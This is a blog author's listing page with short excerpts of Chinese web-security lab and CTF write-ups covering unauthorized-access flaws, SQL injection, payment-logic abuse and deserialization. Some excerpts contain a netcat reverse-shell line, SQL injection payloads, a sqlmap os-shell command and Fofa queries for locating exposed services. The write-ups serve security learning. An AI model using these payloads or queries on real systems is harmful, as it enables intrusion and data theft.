自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

原创 Docker Remote APl未授权访问漏洞

Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。

2024-08-05 20:04:24 245

原创 Jupyter NoteBook未授权访问漏洞

Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888。

2024-08-05 19:37:28 86

原创 Hadoop未授权访问漏洞

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。

2024-08-05 11:58:36 51

原创 RabbitMQ未授权访问漏洞

RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。

2024-08-05 11:52:50 74

原创 ActiveMQ未授权访问漏洞

ActiveMQ是一款流行的开源消息服务器。默认情况下,ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。

2024-08-05 11:41:55 181

原创 Springboot Actuator未授权访问漏洞

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信从而导致信息泄露甚至服务器被接管的事件发生.

2024-08-05 11:11:00 161

原创 Kibana未授权访问漏洞

Kibana如果允许外网访问且没有做安全登录认证,就会被外部任意访问,查看所有数据,造成数据泄露。1.升级Kibana到最新版本,升级地址如下https://www.elastic.co/cn/downloads/kibana。3.如果正常业务中 kibana 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP来访问服务。2.在kibana所在的服务器上安装nginx服务,利用nginx的转发指令实现,需要输入账号密码才可以访问页面。

2024-08-05 10:50:58 174

原创 Elasticsearch未授权访问漏洞

2.在 config/elasticsearch.yml 中为9200端口设置认证等。fofa语法"Elasticsearch" && port="9200"步骤二:存在未授权访问则直接进入到信息页面...不需要输入用户密码登陆.步骤一:使用以下Fofa语法进行Elasticsearch产品搜索..1.访问控制策略,限制IP访问,绑定固定IP。》》》漏洞修复《《《

2024-08-05 10:06:08 92

原创 Jenkins未授权访问漏洞

在打开的URL中..点击 Manage Jenkins。在script console中执行以下操作。2.添加认证,设置强密码复杂度及账号锁定。3.禁止把Jenkins直接暴露在公网,使用以下fofa语法进行产品搜索。

2024-08-04 19:56:10 113

原创 Zookeeper未授权访问漏洞

1.修改 ZooKeeper 默认端口,采用其他端口服务。在Kali中使用以下命令进行未授权访问漏洞测试。使用Zookeeper可视化管理工具进行连接.2.添加访问控制,配置服务来源地址限制策略。3.增加 ZooKeeper 的认证配置。Fofa语法搜索资产信息。

2024-08-04 19:43:49 94

原创 Redis未授权访问漏洞

(7)config get dir/dbfilename 获取路径及数据配置信息。(6)config set dir dirpath 设置路径等配置。进入目录:cd/vulhub-master/redis/4-unacc。vi docker-compose.yml //查看端口和版本号。(5)设置变量:set test"whoami"(2)删除所有数据库内容:flushall。(3)刷新数据库:flushdb(3)(9)get 变量,查看变量名称。(1)查看信息:info。centos 搭建环境。

2024-08-04 19:00:10 59

原创 CmsEasy 支付漏洞

打开环境设置信息安装 (一会解析,吃饭去了)

2024-08-02 18:31:20 104

原创 damicms支付漏洞

填写送货地址----》选择站内扣款----》提交订单。最后再去购买,站内付款即可实现 黑人零元购!在线充值----》我要提现 查看余额。返回产品展示,进行商品的购买。最后返回查看余额将会充值成功。修改他的购买数量为负数。

2024-08-02 16:07:51 96

原创 反序列化--serial

讲以下参数修改为kali ip 和指定端口去kali监听。访问构造好的php文件获取到base64编码后的字节序列。按F12 ---》网络---》cookie得到一串编码。修改palyload改为本机ip加上我们创建的文件。dirb http://靶机ip 扫描目录。用kali扫描ip arp-scan -l。抓包,将编码后的数据抓包后替换红色部分。访问重新修改的gouzao.php文件。访问扫描到的靶机ip访问。写一个cmd.txt文件。解压得到三个php文件。成功执行反弹shell。

2024-08-01 23:03:34 183

原创 Bugku-web-eval

函数用于将传入的字符串作为 PHP 代码执行,在这个场景中,直接使用用户输入的。用hello传参打开文件flag.php找到flag。

2024-08-01 19:33:04 140

原创 JANGOW: 1.0.1

cat /tmp/f|/bin/sh -i 2>&1|nc 靶机地址 443 >/tmp/f');删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"(有的电脑打不了‘/’ 我们可以cd etc ,到etc下cd network ,在进行vim interfaces)写入一个php反弹shell文件(测试该靶机仅有443端口反弹shell)在本地写好蚁剑上传。编辑文件:vim /etc/network/interfaces。

2024-08-01 00:56:35 171

原创 录音管理系统漏洞复现

搜索语法title="录音管理系统"可以用命令进行查看修改添加删除等命令。抓包修改host改成环境的ip。

2024-07-31 18:42:41 181

原创 Bugku-web-alert

ASCII转Unicode得到flag。F12源代码里有一串特殊编码,

2024-07-31 07:45:58 160

原创 Bugku-web-计算器

当我们输入答案时只能输一个数字,我们可以按F12修改maxlength的长度。答案正确出现flag。

2024-07-31 07:34:55 145

原创 Bugku-web-滑稽

按F12flag就在网页源代码中。

2024-07-31 07:29:43 66

原创 IIS解析漏洞

开始--->管理工具--->internet信息服务iis管理器创建一个1.txt文件访问1.txt创建一个1.asp文件将1.txt放到1.asp文件夹内 访问ip/1.asp/1.txt。

2024-07-30 19:48:20 180

原创 Bugku-GET

get 一般在url后加/?what为参数 如果what=flag就会输出flag。

2024-07-30 17:19:56 94

原创 Bugku-签到

flag{BugKu-Sec-pwn!}

2024-07-30 17:04:21 83

原创 Bugku-这是一张单纯的图片

图片右击用记事本打开,可以在最后一行看到他的特殊编码。复制用ASCII转Unicode得到我们的flag。

2024-07-30 16:55:24 189

原创 ai web 1.0 靶机

访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录。获取权限python3 sqlmap.py -r D:\桌面\userid.txt --os-shell。当我们查看1.php是时我们写的一句话木马$-POST会被过滤我们需要加/继续访问robots.txt下的目录,访问m3diNf0,没有权限访问。扫描这些目录,扫描/m3diNf0/路径有一个/info.php的路径。访问info.php我们可以看到他根目录下的路径。

2024-07-30 00:52:06 283

原创 hackme靶机

创建php文件添加一句话木马

2024-07-29 21:23:14 170

原创 CFTHub-web-ssrf

2.网站的目录文件一般都放在var/www/html目录下,我们可以输入file:///var/www/html/flag.php回车。2.根据题目得知访问位于127.0.0.1下的flag.php 所以我们在url后加上。可以在资源管理器或IE地址栏中输入:file:///文件路径)在后面输入@127.0.0.1/flag.php可绕过得到flag。2.在解析网站上获取解析到内网IP的域名并作访问即可获取其flag。4.打开我们的工具菜刀在根目录下可找到flag。5.在根目录下即可找到flag。

2024-07-25 00:22:15 401

原创 墨者学院SQL注入漏洞测试(POST)

判断闭合 闭合方式为单引号,因为加 ‘ 会出现错误,如果是#就会密码错误表是不是他的闭合方式。order by判断他有几列 4列页面异常,3列正常 ,故存在3列。用联合查询查找回显点时我们成功登录。加#页面正常所以#为它的注释。

2024-07-24 08:14:44 112

原创 sql-labs靶场通关攻略

id=-1' union select 1,2,3 --+ (id给一个不存在的值)联合查询 union select 判断回显位置。order by 4 页面异常 表示存在3列。联合查询通过内置库查询当前数据库使用的表中的列。联合查询通过内置库查询当前数据库使用的表。--+注释 页面正常 闭合方式为单引号。and 1=2 页面异常 存在注入。order by 3 页面显示正常。布尔判断 and 1=1 页面正常。判断闭合 加单引号出现错误。order by 判断有几列。

2024-07-22 23:35:58 154

原创 墨者学院SQL手工注入漏洞测试(Db2数据库)

8.查找密码字段 盲猜 password , psw。7.查找用户名字段 盲猜name,username。3.复制链接使用sqlmap工具。5.查找DB2INST1中的表名。10.登录找到key。

2024-07-22 22:31:03 205

原创 墨者学院SQL注入漏洞测试(登录绕过)

2.用户名输入1’ or 1=1#,密码可不填,填了将会更新为新密码。1.在用户名中输入1’,显示查询失败,存在字符型注入。3.登陆成功找到key。

2024-07-22 21:48:11 107

原创 墨者学院 SQL手工注入漏洞测试(MySQL数据库)

8.查列名id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' --+5.判断回显点id=-1 union select 1,2,3,4 --+11.最后进行登录得到key。2.点击登录下面的维护通知。1.点击访问进入网站。

2024-07-22 20:54:27 164

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除